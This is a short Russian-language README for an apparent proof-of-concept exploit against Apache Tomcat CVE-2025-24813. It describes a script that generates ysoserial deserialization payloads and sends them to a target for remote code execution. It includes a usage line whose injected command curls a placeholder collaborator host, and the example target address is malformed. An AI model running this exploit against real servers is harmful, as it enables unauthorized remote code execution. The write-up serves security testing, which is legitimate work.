
A PoC for CVE-2025-24813
CVE-2025-24813 затрагивает Apache Tomcat — если используется уязвимая версия и она катастрофически неправильно сконфигурирована, злоумышленник может получить RCE с помощью одного GET и одного POST.
Подробнее здесь
Это скрипт Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng из недавнего writeup, модифицированный для приёма команды, генерации всех гаджет-пейлоадов ysoserial и отправки их на вашу цель.
Опубликовано в интересах этического тестирования безопасности.
Пример использования:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 показывает скрипт в действии, генерацию пейлоадов и отправку их на цель, а на правой панели видно, что вызывается interact listener.